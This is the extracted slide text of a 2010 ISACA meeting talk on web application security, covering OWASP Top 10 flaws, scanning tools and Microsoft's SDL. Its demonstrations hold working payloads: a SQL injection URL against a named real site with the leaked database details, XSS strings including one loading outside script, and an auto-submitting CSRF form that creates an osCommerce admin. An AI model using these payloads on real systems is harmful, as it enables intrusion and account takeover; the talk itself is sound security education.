Securing Your Company’s Web Presence

Securing Your Company’s Web Presence Russ McRee Microsoft

Holisticinfosec.org

Russ McRee Microsoft

Holisticinfosec.org

ISACA Puget Sound Meeting

3/16/2010

Common security threats to your web presence & what you can do

about it

Common security threats to your web presence & what you can do

about it

Securing your company’s web presence

• Understand the current state of security in the Web 2.0 world

• Common vulnerabilities and how easily hackers can exploit them

• Review common tools available for developers, auditors, managers, & security assessors

• Utilize frameworks (such as OWASP) to assess and prevent common vulnerabilities

AGENDA

State of the Web 2.0 Union

• 83% of websites have had at least one serious vulnerability

• 64% of websites currently have at least one serious vulnerability

• 61% vulnerability resolution-rate with 8,902 unresolved issues remaining (39%)

• Average # of serious severity unresolved vulnerabilities per website: 6.5

Source: WhiteHat Security

State of the Web 2.0 Union State of the Web 2.0 Union

State of the Web 2.0 Union

• Web malware – Gumblar

• Gumblar is a botnet that infects Web servers and infected Web site visitors for the purposes of installing malcode on Personal Computers (PCs) that redirects end-user Google searches to fraudulent Web sites. Also looks for FTP credentials on the PC and may use them to compromise additional Web sites

• Malicious online advertisements – Malicious advertisers purchase ad time in online streams

or compromise existing aggregators

Source: WhiteHat Security

Common vulns and ease of exploit

Source: OWASP Top 10

Common vulns and ease of exploit

2010 CWE/SANS Top 25 Most Dangerous Programming Errors

Common vulns and ease of exploit

• Injection

– SQL, OS, and LDAP injection, occur when

untrusted data is sent to an interpreter as part

of a command or query.

– The attacker’s hostile data can trick the

interpreter into executing unintended

commands or accessing unauthorized data.

Source: OWASP Top 10

Common vulns and ease of exploit Common vulns and ease of exploit

• SQL injection

– Good:

• http://festivalbar.it.msn.com/news/index.p

hp?id=2

– Not good at all:

• http://festivalbar.it.msn.com/news/index.p

hp?id=-1 union select

1,concat_ws(0x3a,user(),@@version,data

base()),3,4,5,6,7,8,9,10,11—

– User = FBAR_FB002

– Host private IP = 192.168.111.119

– MySQL version = 4.1.22

– Database = FBAR_WWW

Common vulns and ease of exploit

SQL injection video demo

festivalbar.it.msn.com

Common vulns and ease of exploit

• Cross-site scripting (XSS)

– XSS flaws occur whenever an application

takes untrusted data and sends it to a web

browser without proper validation and

escaping

– XSS allows attackers to execute script in the

victim’s browser which can hijack user

sessions, deface web sites, or redirect the

user to malicious sites

Source: OWASP Top 10

Common vulns and ease of exploit Common vulns and ease of exploit

• Cross-site scripting (XSS)

– Good

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b604491e163632

– Bad

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script>alert(document.cookie)</script>4491e163632

– Really bad

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script src=http://holisticinfosec.org/js/warning.js></script>4491e163632

Common vulns and ease of exploit

XSS video demo

eclime 1.0.9b (osCommerce fork)

Common vulns and ease of exploit

• Cross-site request forgery (CSRF)

– A CSRF attack forces a logged-on victim’s browser to

send a forged HTTP request, including the victim’s

session cookie and any other authentication information,

to a vulnerable web application

– This allows the attacker to force the victim’s browser to

generate requests the vulnerable application thinks are

legitimate requests from the victim

Source: OWASP Top 10

Common vulns and ease of exploit Common vulns and ease of exploit

• Cross-site request forgery

<html>

<form name="createID"

action="http://192.168.248.102/oscommerce/catalog/admin/administ

rators.php?action=insert" method=Post AUTOCOMPLETE="off">

<input type="hidden" name="username" value="frank">

<input type="hidden" name="password" value="test">

<input type="hidden" name="x" value="">

<input type="hidden" name="y" value="">

</form>

<script>

window.setTimeout(function() {

document.createID.submit();

}, 3000);

</script>

<h1>Adding an osCommerce admin user...</h1>

</html>

Common vulns and ease of exploit

CSRF video demo

osCommerce

Common tools – commercial Common tools – commercial

• Acunetix WVS by Acunetix

• AppScan by IBM

• Burp Suite Professional by PortSwigger

• Hailstorm by Cenzic

• MileScan Web Security Auditor by MileSCAN Technologies

• N-Stalker by N-Stalker

• NetSparker by Mavituna Security

• NeXpose by Rapid7

• NTOSpider by NTObjectives

• Retina Web Security Scanner by eEye Digital Security

• SecurityQA Toolbar by iSEC Partners

• WebApp360 by nCircle

• WebInspect by HP

Source: WASC Scanner List Tools I’ve used

Common tools - Saas Common tools - Saas

• AppScan OnDemand by IBM

• ClickToSecure by Cenzic

• QualysGuard Web Application Scanning

by Qualys

• Sentinel by WhiteHat

• Veracode Web Application Security by

Veracode

• WebInspect by HP

Source: WASC Scanner List Tools I’ve used

Common tools – Free/Open Source Common tools – Free/Open Source

• Burp Suite by PortSwigger

• Grabber by Romain Gaucher

• Grendel-Scan by David Byrne and Eric Duprey

• Nikto/Wikto

• Paros by Chinotec

• Powerfuzzer by Marcin Kozlowski

• SecurityQA Toolbar by iSEC Partners

• TamperData

• W3AF by Andres Riancho

• Wapiti by Nicolas Surribas

• Watcher & Fiddler

Source: WASC Scanner List Tools I’ve used

Tools – Burp & Tamper Data Tools – Burp & Tamper Data

Burp or

Tamper Data demo

Frameworks

• Audit against OWASP Top 10 and CWE/SANS Top 25

• Now balance that those against compliance requirements

• You’re the auditors, you tell me ;-) – PCI

– HIPAA

– SOX

– GLBA

Frameworks

• Security Development Lifecycle (SDL) – Incorporates comprehensive security and privacy

protections for online services and Web applications. Includes requirements that address widely exploited classes of Web vulnerabilities, including XSS, SQL injection, and CSRF among others.

• Applies to large, medium and small organizations

• Applies to various development methodologies

• Applies to any platform

Frameworks

• SDL Threat Modeling – Classic software threat modeling

– Infrastructure threat modeling

Resources Resources

• OWASP Top 10

– http://www.owasp.org/index.php/Category:O

WASP_Top_Ten_Project

• 2010 CWE/SANS Top 25 Most

Dangerous Programming Errors

– http://cwe.mitre.org/top25/

• 8th WhiteHat Website Security Statistic

Report

– http://www.slideshare.net/jeremiahgrossman/

whitehat-security-8th-website-security-

statistics-report-2494163

Resources Resources

• SDL

– http://www.microsoft.com/security/sdl/default.

aspx

• Infrastructure Threat Modeling

– http://technet.microsoft.com/en-

us/library/dd941826.aspx

• SDL Threat Modeling Tool

– http://www.microsoft.com/downloads/details.

aspx?FamilyID=A48CCCB1-814B-47B6-

9D17-1E273F65AE19&displayLang=en

• Toolsmith

– http://holisticinfosec.org/content/view/12/26/

Resources Resources

• WebGoat

– http://www.owasp.org/index.php/Category:O

WASP_WebGoat_Project

Russ McRee russ at holisticinfosec dot org

rmcree at microsoft dot com

Russ McRee russ at holisticinfosec dot org

rmcree at microsoft dot com

ISACA Puget Sound Meeting

3/16/2010

QUESTIONS?

QUESTIONS?